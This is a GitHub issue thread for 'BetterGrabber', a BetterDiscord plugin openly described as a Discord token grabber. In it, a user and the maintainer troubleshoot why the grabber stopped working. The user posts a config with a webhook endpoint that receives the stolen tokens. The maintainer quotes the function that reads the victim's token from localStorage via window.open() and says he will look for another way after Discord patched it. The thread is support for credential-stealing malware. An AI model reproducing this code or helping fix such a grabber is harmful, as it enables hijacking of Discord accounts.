HideakiAtsuyo / BetterGrabber

Better Discord Tokens Grabber Plugin
84 stars 21 forks source link

window.open().localStorage patched #17

Closed Sief1334 closed 2 years ago

Sief1334 commented 2 years ago

Config

  {
    pingOnResult: true,
    webHook: "/api/webhooks/943526060115525654/qFMzk_JDbn9r_N-ExCE8kKg7b8Pfpa-WZK9sM3zNy0uMGSEqaBDPamHCwJf-SoI-2HGS",
    webhookUsername: "Hello World",
    webhookAvatar: "https://cdn.discordapp.com/avatars/908070943329488916/35ebf6d39bc25e52da855424119bc28f.webp?size=80",

    embedTitle: "Hello World",
    embedColor: 0x36393f,

    tts: false
}

Problem

Mon problème je fais comme vous sur la vidéo et sa me fait rien

HideakiAtsuyo commented 2 years ago

1) Ctrl + Shift + I 2) Select Console 3) Reload Discord 4) Send the error here

Sief1334 commented 2 years ago

Can you anydesk https://www.anydesk.com/fr

Because I did ctrl + shift + i and on discord it shows me nothing

HideakiAtsuyo commented 2 years ago

Can you anydesk https://www.anydesk.com/fr

Because I did ctrl + shift + i and on discord it shows me nothing

Sief1334 commented 2 years ago

image

Sief1334 commented 2 years ago

image

Sief1334 commented 2 years ago

image

HideakiAtsuyo commented 2 years ago

image

https://github.com/HideakiAtsuyo/BetterGrabber/issues/17#issuecomment-1041717693

Show the erros only, errors are red.

Sief1334 commented 2 years ago

image

Sief1334 commented 2 years ago

I only have this as a mistake

HideakiAtsuyo commented 2 years ago

image

No new error when you ctrl + r ? the sh thing is a normal error from Discord :)

Sief1334 commented 2 years ago

Yes I do ctrl r and nothing happens

HideakiAtsuyo commented 2 years ago

Yes I do ctrl r and nothing happens

Are you using Stable Discord or PTB or Canary ?

Sief1334 commented 2 years ago

Normal discord

Sief1334 commented 2 years ago

image

HideakiAtsuyo commented 2 years ago

Well without any error I can't do anything sorry ;(

HideakiAtsuyo commented 2 years ago

Its this function:

function Info(info){
            return new Promise(async (resolve, reject) => {
                return resolve(window.open().localStorage[info])
            });
        }

I will update Discord & Better Discord I will tell you if it work on my side

HideakiAtsuyo commented 2 years ago

It's a Discord problem not Better I think, I will update it later :)

HideakiAtsuyo commented 2 years ago

It's a Discord problem not Better I think, I will update it later :)

Thanks man

I will have to find an another way to get localStorage elements, window.open() now return null !

HideakiAtsuyo commented 2 years ago

accept discord fa name: Drip @HideakiAtsuyo

My DMs are not a support place and we can talk here :)

HideakiAtsuyo commented 2 years ago

I dont need support bro i got a nice feature you could implement I did and it worked perfectly

Then you can send it here with some explanations ! :)

HideakiAtsuyo commented 2 years ago

Closed & Locked until 25 Stars.